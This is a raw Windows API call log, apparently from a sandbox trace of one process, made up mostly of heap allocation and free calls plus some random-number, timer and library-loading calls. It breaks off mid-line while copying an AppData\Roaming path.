[0079.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a790 [0079.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a7e8 [0079.418] GetEnvironmentVariableW (in: lpName="SYSTEMDRIVE", lpBuffer=0x2cfc7c, nSize=0x32 | out: lpBuffer="C:") returned 0x2 [0079.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8598 [0079.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e85c0 [0079.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c8) returned 0x72aa60 [0079.418] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0079.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e85e8 [0079.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x6e93a8 [0079.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8610 [0079.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72a6d8 [0079.418] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0079.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1d4e3) returned 0x6eb578 [0079.418] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x130) returned 0x72a920 [0079.419] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8638 [0079.419] CryptAcquireContextA (in: phProv=0x2cfbf0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2cfbf0*=0x708cb0) returned 1 [0080.019] RtlWakeAllConditionVariable () returned 0x0 [0080.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6e4a40 [0080.020] CryptAcquireContextA (in: phProv=0x6e4a40, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x6e4a40*=0x709260) returned 1 [0080.021] CryptGenRandom (in: hProv=0x709260, dwLen=0x20, pbBuffer=0x6e8638 | out: pbBuffer=0x6e8638) returned 1 [0080.021] CryptReleaseContext (hProv=0x708cb0, dwFlags=0x0) returned 1 [0080.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8638 | out: hHeap=0x6d0000) returned 1 [0080.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8638 [0080.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x120c) returned 0x70a650 [0080.022] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfb48 | out: lpPerformanceCount=0x2cfb48*=19997694795) returned 1 [0080.022] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.022] GetLastError () returned 0x57 [0080.022] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0080.022] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfb88 | out: lpSystemTimeAsFileTime=0x2cfb88*(dwLowDateTime=0x1dbc1a40, dwHighDateTime=0x1d62227)) [0080.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0080.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709e68 [0080.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709ea8 [0080.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x7098d0 [0080.023] GetLastError () returned 0x7e [0080.023] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0080.023] SetLastError (dwErrCode=0x7e) [0080.023] GetLastError () returned 0x7e [0080.023] SetLastError (dwErrCode=0x7e) [0080.023] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0080.023] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ea8 | out: hHeap=0x6d0000) returned 1 [0080.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x709a08 [0080.023] GetLastError () returned 0x7e [0080.023] SetLastError (dwErrCode=0x7e) [0080.023] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709a08 | out: hHeap=0x6d0000) returned 1 [0080.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708cb0 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8688 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x708f20 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x6e94d0 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8890 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x6df0f8 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x6e94e0 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e88b8 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x6df110 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e88e0 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x709470 [0080.024] GetLastError () returned 0x7e [0080.024] SetLastError (dwErrCode=0x7e) [0080.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e8908 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e8930 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72a840 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72a850 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b7f8 [0080.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a850 | out: hHeap=0x6d0000) returned 1 [0080.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b808 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a840 | out: hHeap=0x6d0000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b7f8 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x6df128 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x6df140 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df128 | out: hHeap=0x6d0000) returned 1 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b808 | out: hHeap=0x6d0000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x6df128 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x72bbf8 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df128 | out: hHeap=0x6d0000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x6df128 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bbf8 | out: hHeap=0x6d0000) returned 1 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x6df140 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709ea8 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709e68 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ea8 | out: hHeap=0x6d0000) returned 1 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df128 | out: hHeap=0x6d0000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709ea8 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8958 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ea8 | out: hHeap=0x6d0000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709ea8 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8958 | out: hHeap=0x6d0000) returned 1 [0080.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709e68 [0080.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x72a840 [0080.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8958 [0080.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a840 | out: hHeap=0x6d0000) returned 1 [0080.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ea8 | out: hHeap=0x6d0000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b808 [0080.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x6df128 [0080.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b808 | out: hHeap=0x6d0000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x6df140 [0080.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df128 | out: hHeap=0x6d0000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709ea8 [0080.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x72a840 [0080.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ea8 | out: hHeap=0x6d0000) returned 1 [0080.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a840 | out: hHeap=0x6d0000) returned 1 [0080.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8958 | out: hHeap=0x6d0000) returned 1 [0080.026] RtlWakeAllConditionVariable () returned 0x0 [0080.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8908 | out: hHeap=0x6d0000) returned 1 [0080.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70b868 [0080.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708f20 | out: hHeap=0x6d0000) returned 1 [0080.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8688 | out: hHeap=0x6d0000) returned 1 [0080.027] RtlInitializeConditionVariable () returned 0xcce0fc [0080.027] RtlWakeAllConditionVariable () returned 0x0 [0080.027] GetCurrentThreadId () returned 0x7b8 [0080.027] GetCurrentThreadId () returned 0x7b8 [0080.027] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b808 [0080.027] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x708f20 [0080.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708f20 | out: hHeap=0x6d0000) returned 1 [0080.027] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x708f20 [0080.027] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70b988 [0080.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708f20 | out: hHeap=0x6d0000) returned 1 [0080.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b988 | out: hHeap=0x6d0000) returned 1 [0080.027] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x708f20 [0080.027] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70b988 [0080.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b988 | out: hHeap=0x6d0000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70b988 [0080.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b988 | out: hHeap=0x6d0000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x70b988 [0080.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70ba90 [0080.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ba90 | out: hHeap=0x6d0000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x70ba90 [0080.028] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf968 | out: lpPerformanceCount=0x2cf968*=19998323188) returned 1 [0080.028] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf9a8 | out: lpSystemTimeAsFileTime=0x2cf9a8*(dwLowDateTime=0x1dbc1a40, dwHighDateTime=0x1d62227)) [0080.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0080.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8688 [0080.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709ea8 [0080.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ea8 | out: hHeap=0x6d0000) returned 1 [0080.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8688 | out: hHeap=0x6d0000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8688 [0080.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709ea8 [0080.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ea8 | out: hHeap=0x6d0000) returned 1 [0080.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8688 | out: hHeap=0x6d0000) returned 1 [0080.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0080.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ba90 | out: hHeap=0x6d0000) returned 1 [0080.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0080.028] GetLastError () returned 0x7e [0080.029] SetLastError (dwErrCode=0x7e) [0080.029] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0080.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70ba90 [0080.029] RtlWakeAllConditionVariable () returned 0x0 [0080.029] RtlWakeAllConditionVariable () returned 0x0 [0080.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709ea8 [0080.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e8688 [0080.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70bbb0 [0080.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70bcd0 [0080.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e8908 [0080.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e8958 [0080.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70bdf0 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70bf10 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e8980 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70c030 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x513) returned 0x70c150 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70c670 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x70c790 [0080.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c670 | out: hHeap=0x6d0000) returned 1 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x70c9b0 [0080.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c790 | out: hHeap=0x6d0000) returned 1 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e89a8 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e89d0 [0080.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89a8 | out: hHeap=0x6d0000) returned 1 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70c670 [0080.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89d0 | out: hHeap=0x6d0000) returned 1 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x70c790 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x52b) returned 0x70cbd0 [0080.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70cbd0 | out: hHeap=0x6d0000) returned 1 [0080.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c790 | out: hHeap=0x6d0000) returned 1 [0080.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c9b0 | out: hHeap=0x6d0000) returned 1 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x6df140 [0080.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e89d0 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e89a8 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e89f8 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e8a20 [0080.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89a8 | out: hHeap=0x6d0000) returned 1 [0080.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89d0 | out: hHeap=0x6d0000) returned 1 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x70c790 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e89d0 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e89a8 [0080.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89d0 | out: hHeap=0x6d0000) returned 1 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70c9b0 [0080.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89a8 | out: hHeap=0x6d0000) returned 1 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x23) returned 0x72a840 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x433) returned 0x70cad0 [0080.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70cad0 | out: hHeap=0x6d0000) returned 1 [0080.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a840 | out: hHeap=0x6d0000) returned 1 [0080.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70cad0 [0080.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c9b0 | out: hHeap=0x6d0000) returned 1 [0080.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c790 | out: hHeap=0x6d0000) returned 1 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709e68 [0080.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70c790 [0080.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70c8b0 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8958 | out: hHeap=0x6d0000) returned 1 [0080.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70cbf0 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c8b0 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8a20 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89f8 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c790 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c670 | out: hHeap=0x6d0000) returned 1 [0080.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70c670 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c670 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c150 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c030 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70cad0 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bf10 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bdf0 | out: hHeap=0x6d0000) returned 1 [0080.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8908 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bcd0 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bbb0 | out: hHeap=0x6d0000) returned 1 [0080.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70bbb0 [0080.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70bcd0 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bbb0 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bcd0 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70cbf0 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ba90 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b988 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8930 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b868 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7098d0 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e88b8 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e94e0 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8890 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e94d0 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709470 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e88e0 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708cb0 | out: hHeap=0x6d0000) returned 1 [0080.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0080.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0080.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x709028 [0080.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709be8 | out: hHeap=0x6d0000) returned 1 [0080.034] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708cb0 [0080.034] lstrcpyW (in: lpString1=0x2cfb14, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS 